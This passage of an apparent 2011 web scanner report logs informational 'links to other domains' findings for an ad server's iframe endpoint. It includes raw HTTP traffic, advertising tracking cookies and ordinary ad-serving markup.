P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: liday1=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0014.rm.sp2
Set-Cookie: ih="b!!!!/!,`ch!!!!#=3]gD!.`.U!!!!#=3H3k!1-bB!!!!#=3f:x!1n,b!!!!(=3f9K!2(Qv!!!!#=3^]V!2reF!!!!'=3f<!!38Yq!!!!#=3f8`!3Eo4!!!!#=3f.'!43C%!!!!#=3f:v!4A]Y!!!!#=3f8q!4ZV4!!!!#=3f9)!4ZV5!!!!#=3f8^"; path=/; expires=Thu, 05-Sep-2013 12:48:10 GMT
Set-Cookie: vuday1=@n$r!BKZI(BgvR/4M6EqoyOxB!!w[/!79C8jsp`9; path=/; expires=Wed, 07-Sep-2011 00:00:00 GMT
Set-Cookie: pv1="b!!!!(!!`5!!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]gD=7pQN~!!qrZ!!E)(!%L:B!2reF!'<Lw!#a.3!!QB($To(0!i=9S!!28s!(Y#b~~~~~~=3f<!=3p8(M.jTN!#101!,Y+@!$Xx(!1n,b!#t3o~!!?5%$To(2!w1K*!!NN)!'1C:!$]7n~~~~~=3f9K~~!$?74!!E(y!$Xwo!4ZV4!'@G9!!!!$!?5%!$To(.!w1K*!%4=!!$#x<!(^vn~~~~~=3f9)=4'2#!!!#G!$5w<!!!?,!$bkN!43C%!'4e2!!!!$!?5%!$To(.!wVd.!%4<v!#3oe!(O'k~~~~~=3f:v=7y%)!!!%Q"; path=/; expires=Thu, 05-Sep-2013 12:48:10 GMT
Set-Cookie: BX=ei08qcd75vc4d&b=3&s=8s&t=246; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Set-Cookie: uid=uid=79eb72fa-d886-11e0-bbdc-78e7d15f4cd0&_hmacv=1&_salt=3219701141&_keyid=k1&_hmac=0b364fb74b71859af53b7cc2b19df70b4ae1966f; path=/; expires=Thu, 06-Oct-2011 12:48:10 GMT
Set-Cookie: lifb=0EA2)A9.-B!6-Nb%>oc=M5Jkn/>M1M)lss@; path=/; expires=Tue, 13-Sep-2011 12:48:10 GMT
Cache-Control: no-store
Last-Modified: Tue, 06 Sep 2011 12:48:10 GMT
Pragma: no-cache
Content-Length: 1002
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(9773674);}
</script><iframe src="http://view.atdmt.com/TR1/iview/332867993/direct/01?time=1315313290&click=http://ads.bluelithium.com/clk?3,eAGlUU2TmkAQ.TM5pQzzDbNrzWFg3BVxRBA.yCWFYxZFDShs4e6vDwmllXv60P26u.p19WtEhgazJ8IN30LGWGa2Q0Qw-Wk4NNwM4HA4JIgwTmzG7cEmWCo59ma-dC9-tZR.LUjfgx798ZH070nXz6XyJvZ7V-1tquG9-39R7SaPRd3CvGcr5Kc.L3z3wa0MS9cR08q003VEQ5U2Onk5aQ8dtPLpNDH0e7I76mR1nmFN0.YxKQb7pqmeAchP5TY7Wdl1Z31k-7K0THkGC.9VIHY5QP72hIEWDnc4IRaiHEJCnQ50YjKMOoAch2IHKFFX5bWpwUJgZtuUY.as45EHfnycGiGLlX05bmtTh9dxfGNpEKYHCNmv1LggFakchyEYbeYCEcQIhpRzMBX1Zlbkr4E.HzmVjKsiOVltEemz3u-c7MjOL2UuXb2WwBWwWcRR46r4vPwGJj1N92jOGbQxxiAQKb.QhtzeVOtNczW.jfVo1UZACpsyiggFsYDg65e7LP01.0jyGx3cplw=," frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="300" height="100"></iframe>
...[SNIP]...

15.31. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /iframe3?XKUDAOiUGABvUqUAAAAAAKWdKAAAAAAAAgAAAAYAAAAAAP8AAAADCOQEHgAAAAAAtPUSAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAIAAwAAAAAAyHa-nxovB0BmZmZmZmYQQMh2vp8aLwdAZmZmZmZmEEDIdr6fGi8HQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC28wb3QvquCrX4WZpQcY4wcHVfXnpzR4ctG.6oAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15j13o5q5%2FM%3D787833.14445127.14291894.22%2FD%3Dsports%2FS%3D2022092242%3AN%2F_ylt%3DAq9E8pK_YqzvgGRT6l1fMpDSrYZ4%2FY%3DYAHOO%2FEXP%3D1315320281%2FL%3D.mJTO0PDlB_pARpjTl.wjQAqMhd7ak5mFbgADqhS%2FB%3D0F2xPtj8elw-%2FJ%3D1315313081109312%2FK%3DdHuXEgTLQ4cGOnShgI49sw%2FA%3D6261245%2FR%3D0%2F%2A%24,http%3A%2F%2Fsports.yahoo.com%2Fnfl%2Fblog%2Fshutdown_corner%2Fpost%2Ftiki-barber-remains-unemployed-and-sad%3Furn%3Dnfl-wp6443,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445127%26Z%3D728x90%26_PVID%3D.mJTO0PDlB%255fpARpjTl.wjQAqMhd7ak5mFbgADqhS%26_salt%3D1652832779%26cb%3D1315313081109312%26i%3D140509%26r%3D0,02602a14-d886-11e0-8b21-78e7d161fe68 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/st?_PVID=.mJTO0PDlB_pARpjTl.wjQAqMhd7ak5mFbgADqhS&ad_type=iframe&ad_size=728x90&site=140509&section_code=14445127&cb=1315313081109312&yud=zip%3D%26ycg%3D%26yyob%3D&pub_redirect_unencoded=1&pub_redirect=http://global.ard.yahoo.com/SIG=15j13o5q5/M=787833.14445127.14291894.22/D=sports/S=2022092242:N/_ylt=Aq9E8pK_YqzvgGRT6l1fMpDSrYZ4/Y=YAHOO/EXP=1315320281/L=.mJTO0PDlB_pARpjTl.wjQAqMhd7ak5mFbgADqhS/B=0F2xPtj8elw-/J=1315313081109312/K=dHuXEgTLQ4cGOnShgI49sw/A=6261245/R=0/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; pv1="b!!!!%!!`5!!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]gD=7pQN~!!qrZ!,Y+@!$[S0!2reF!''w-!!!!$!?5%!'jyc4!i=9S!!J0T!(>n0~~~~~~=3]gE=3gdJM.jTN!#101!,Y+@!$XwL!1n,b!#t3o~!!ZH)'jyc6!w1K*!!J0T!$!$U!$]7n~~~~~=3]ih~~"; ih="b!!!!)!,`ch!!!!#=3]gD!.`.U!!!!#=3H3k!1n,b!!!!%=3]ih!2(Qv!!!!#=3^]V!2reF!!!!#=3]gE!3Eo4!!!!#=3f.'"; vuday1=4M6Eq!79C835n]5; liday1=*YKlx!79C85[p%3; bh="b!!!#E!!-C,!!!!%=3`c_!!-O3!!!!#=3G@^!!1CB!!!!#=3_%L!!3:c!!!!#=3f8T!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4dM!!!!#=3]fh!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!#=3]fx!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#RY.!!!!%=3H5P!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#]W%!!!!%=3H5P!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#tCn!!!!%=3H5P!#tK$!!!!%=3H5P!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*Q<!!!!%=3H5P!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$/iQ!!!!%=3H5P!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3jT!!!!%=3H5P!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$5Nu!!!!%=3H5P!$5oO!!!!%=3H5P!$5qE!!!!%=3H5P!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$:Py!!!!%=3H5P!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s@!!!!$=3H5P!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?i5!!!!%=3`c_"; BX=ei08qcd75vc4d&b=3&s=8s&t=246

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:44:52 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: liday1=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0013.rm.sp2
Set-Cookie: ih="b!!!!*!,`ch!!!!#=3]gD!.`.U!!!!#=3H3k!1n,b!!!!%=3]ih!2(Qv!!!!#=3^]V!2reF!!!!#=3]gE!3Eo4!!!!#=3f.'!4ZV5!!!!$=3f8^"; path=/; expires=Thu, 05-Sep-2013 12:44:52 GMT
Set-Cookie: bh="b!!!#F!!-C,!!!!%=3`c_!!-O3!!!!#=3G@^!!1CB!!!!#=3_%L!!3:c!!!!#=3f8T!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4dM!!!!#=3]fh!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!#=3]fx!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#RY.!!!!%=3H5P!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#]W%!!!!%=3H5P!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#tCn!!!!%=3H5P!#tK$!!!!%=3H5P!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*Q<!!!!%=3H5P!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$/iQ!!!!%=3H5P!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3jT!!!!%=3H5P!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$5Nu!!!!%=3H5P!$5oO!!!!%=3H5P!$5qE!!!!%=3H5P!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$:Py!!!!%=3H5P!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s@!!!!$=3H5P!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!$=3f8^!$?i5!!!!%=3`c_"; path=/; expires=Thu, 05-Sep-2013 12:44:52 GMT
Set-Cookie: vuday1=BgvR*4M6Eq!79C8M#n45; path=/; expires=Wed, 07-Sep-2011 00:00:00 GMT
Set-Cookie: pv1="b!!!!'!!`5!!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]gD=7pQN~!!qrZ!,Y+@!$[S0!2reF!''w-!!!!$!?5%!'jyc4!i=9S!!J0T!(>n0~~~~~~=3]gE=3gdJM.jTN!#101!,Y+@!$XwL!1n,b!#t3o~!!ZH)'jyc6!w1K*!!J0T!$!$U!$]7n~~~~~=3]ih~~!$?74!!E)(!$Xwe!4ZV5!'@G9!!!!$!?5%!$To(.!wVd.!%4=*!$#x5!(^vn~~~~~=3f8^=4'1X!!!#G"; path=/; expires=Thu, 05-Sep-2013 12:44:52 GMT
Set-Cookie: BX=ei08qcd75vc4d&b=3&s=8s&t=246; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Set-Cookie: uid=uid=0437c6f8-d886-11e0-ae4a-78e7d15f7c8c&_hmacv=1&_salt=1842979857&_keyid=k1&_hmac=a0feea0b76b539d7f6f3647d41d7513f336eb436; path=/; expires=Thu, 06-Oct-2011 12:44:52 GMT
Set-Cookie: lifb=M5Jkn#DZT*WZK^n; path=/; expires=Tue, 06-Sep-2011 16:44:52 GMT
Cache-Control: no-store
Last-Modified: Tue, 06 Sep 2011 12:44:52 GMT
Pragma: no-cache
Content-Length: 1242
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10834543);}
</script><script type="text/javascript" src="http://tags.mathtag.com/view/js/?strat=109185&cr=126413&supply=99&random=1315313092&rfr=http%3A%2F%2Fsports%2Eyahoo%2Ecom%2Fnfl%2Fblog%2Fshutdown%5Fcorner%2Fpost%2Ftiki%2Dbarber%2Dremains%2Dunemployed%2Dand%2Dsad%3Furn%3Dnfl%2Dwp6443&rfid=238940&ymct=http%3A%2F%2Fads%2Ebluelithium%2Ecom%2Fclk%3F3%2CeAGVUMtuo0AQ%2EJk9rQzDPMAQa7QaG79iE7ABxfhiAUPAmDc42Pv164RstNftQ3d1taqkLognWhD4PJQkJZK5HATKBGKEo1CWNMRH0mQyUTSECJaJOjpsXJ2ZZ3fJpu9u7bLP2rzyzYAYiz%2DAN2yW%2DjH1mbmbrz55xjrLtYfjjFnpl34g%2ErPr%2EJmtvzSP2Q9wuysWVrqefpvp7P6SsrvnzKXt646YutcZziIzZhLx0vVt64Tk6PCL4Xi3Y%2D4i81vI6CjpuuoJgDgrAz8T%2EYaLdz8pSzEsc2CvlxTKKcSlXMvAoGN1rGIsQkKIDNH4AZAGVY2ICAGdtlXZdC2wKZIQesSKCHp6Aad71lFWa3O12py8%2Dvd7vNw7SgbfjEq3G%2D9IgEc9tjJNMD9YFGIo44dehWBLxfzZMSVLz6aniu2r1MnEPt2x2kj42L%2EI%2DSKImV4nNphSaYFuVpeqUdYL4HmwgVhSIZQ0DBHYUL66Huaxs92RcGkWdhKvidb2gFEFKRARGeypBH7%2D%2DJvH8Mw%2EWRRvGQiyMgZtcu142RensGyKqAFV2XagO1%2EOQuA3QdQITZT756IVrkWUV1l5j7jgF1xoff7r2hT0YST0lUII%2EgN86sV0%2C"></script>
...[SNIP]...

15.32. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe3?VqUDAPKUGABlUZgAAAAAAAnhJQAAAAAAAgAEAAIAAAAAAP8AAAADCN0EHgAAAAAAc7sgAAAAAABfoTEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC1JAIAAAAAAAIAAwAAAAAAFK5H4XoUBkAUrkfhehQGQBSuR-F6FAZAFK5H4XoUBkAUrkfhehQGQBSuR-F6FAZAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJYpIaTfuuCpzSNjBmAwIi1JX6s2W-oVD3HxaZAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15p035eiu%2FM%3D787833.14445103.14291869.1659633%2FD%3Dmaps%2FS%3D2022332404%3ALREC%2FY%3DYAHOO%2FEXP%3D1315320555%2FL%3Dvf1TJGKIKoTpARpjTl.wjRRUMhd7ak5mFssACRdk%2FB%3Du0uOQmKJiUo-%2FJ%3D1315313355644217%2FK%3DwAUe6WLorFCi06uKuG03Mw%2FA%3D6261227%2FR%3D0%2F%2A%24,http%3A%2F%2Fmaps.yahoo.com%2Fdarla_fc%3Fcb%3Dyahoo.ads.darla._loaded%26p%3Dmaps%26f%3D2022332404%26l%3Dlrec%26en%3Dutf-8%26rn%3D1315331355624%26em%3D%257b%2522site-attribute%2522%253a%2522content%253dno_expandable%253bajax_cert_expandable%2522%252c%2522ad,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445103%26Z%3D300x250%26_PVID%3Dvf1TJGKIKoTpARpjTl.wjRRUMhd7ak5mFssACRdk%26_salt%3D3929728865%26cb%3D1315313355644217%26i%3D140469%26r%3D0,a1842154-d886-11e0-9de6-78e7d15f4cd0 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/st?_PVID=vf1TJGKIKoTpARpjTl.wjRRUMhd7ak5mFssACRdk&ad_type=iframe&ad_size=300x250&site=140469&section_code=14445103&cb=1315313355644217&yud=zip%3D%26ycg%3D%26yyob%3D&pub_redirect_unencoded=1&pub_redirect=http://global.ard.yahoo.com/SIG=15p035eiu/M=787833.14445103.14291869.1659633/D=maps/S=2022332404:LREC/Y=YAHOO/EXP=1315320555/L=vf1TJGKIKoTpARpjTl.wjRRUMhd7ak5mFssACRdk/B=u0uOQmKJiUo-/J=1315313355644217/K=wAUe6WLorFCi06uKuG03Mw/A=6261227/R=0/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; bh="b!!!#N!!-C,!!!!%=3`c_!!-O3!!!!#=3G@^!!1CB!!!!#=3_%L!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!#=3f8T!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!#=3f8s!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!sXC!!!!#=3f:p!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#:@G!!!!#=3f9$!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#RY.!!!!%=3H5P!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#]W%!!!!%=3H5P!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#tCn!!!!%=3H5P!#tK$!!!!%=3H5P!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*Q<!!!!%=3H5P!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-p1!!!!#=3f8c!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$/iQ!!!!%=3H5P!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3jT!!!!%=3H5P!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$5Nu!!!!%=3H5P!$5oO!!!!%=3H5P!$5qE!!!!%=3H5P!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$:Py!!!!%=3H5P!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s@!!!!$=3H5P!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!$=3f9)!$?i5!!!!%=3`c_"; liday1=fh'jT*YKlx8SkUrhG%Lm!79C8>U9f4; ih="b!!!!/!,`ch!!!!#=3]gD!.`.U!!!!#=3H3k!1-bB!!!!#=3f:x!1n,b!!!!(=3f9K!2(Qv!!!!#=3^]V!2reF!!!!'=3f<'!38Yq!!!!#=3f8`!3Eo4!!!!#=3f.'!43C%!!!!#=3f:v!4A]Y!!!!#=3f8q!4ZV4!!!!#=3f9)!4ZV5!!!!#=3f8^"; vuday1=@n$r!BKZI(BgvR/4M6EqoyOxB!!w[/!79C8jsp`9; pv1="b!!!!(!!`5!!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]gD=7pQN~!!qrZ!!E)(!$[Rn!2reF!'<Lw!#a.3!!QB($To(0!i=9S!!28s!(Y#b~~~~~~=3f<'=3p8,M.jTN!#101!,Y+@!$Xx(!1n,b!#t3o~!!?5%$To(2!w1K*!!NN)!'1C:!$]7n~~~~~=3f9K~~!$?74!!E(y!$Xwo!4ZV4!'@G9!!!!$!?5%!$To(.!w1K*!%4=!!$#x<!(^vn~~~~~=3f9)=4'2#!!!#G!$5w<!!!?,!$bkN!43C%!'4e2!!!!$!?5%!$To(.!wVd.!%4<v!#3oe!(O'k~~~~~=3f:v=7y%)!!!%Q"; lifb=0EA2)A9.-B!6-Nb'W00AM5Jkn/>M1M:>Rmw; BX=ei08qcd75vc4d&b=3&s=8s&t=246

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:49:19 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
X-RightMedia-Hostname: raptor0228.rm.sp2
Set-Cookie: ih="b!!!!0!,`ch!!!!#=3]gD!.`.U!!!!#=3H3k!1-bB!!!!#=3f:x!1n,b!!!!(=3f9K!2(Qv!!!!#=3^]V!2reF!!!!'=3f<'!38Yq!!!!#=3f8`!38Yt!!!!$=3f<j!3Eo4!!!!#=3f.'!43C%!!!!#=3f:v!4A]Y!!!!#=3f8q!4ZV4!!!!#=3f9)!4ZV5!!!!#=3f8^"; path=/; expires=Thu, 05-Sep-2013 12:49:19 GMT
Set-Cookie: vuday1=@n$r$BKZI(BgvR/4M6EqoyOxB!!w[/!79C8kS^YR; path=/; expires=Wed, 07-Sep-2011 00:00:00 GMT
Set-Cookie: BX=ei08qcd75vc4d&b=3&s=8s&t=246; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Set-Cookie: lifb=0EA2)A9.-BBcN3V%T!GP!6-Nb'W00AM5Jkn/>M1MrX6Q3; path=/; expires=Tue, 13-Sep-2011 12:48:14 GMT
Cache-Control: no-store
Last-Modified: Tue, 06 Sep 2011 12:49:19 GMT
Pragma: no-cache
Content-Length: 2881
Content-Type: text/html
Age: 0
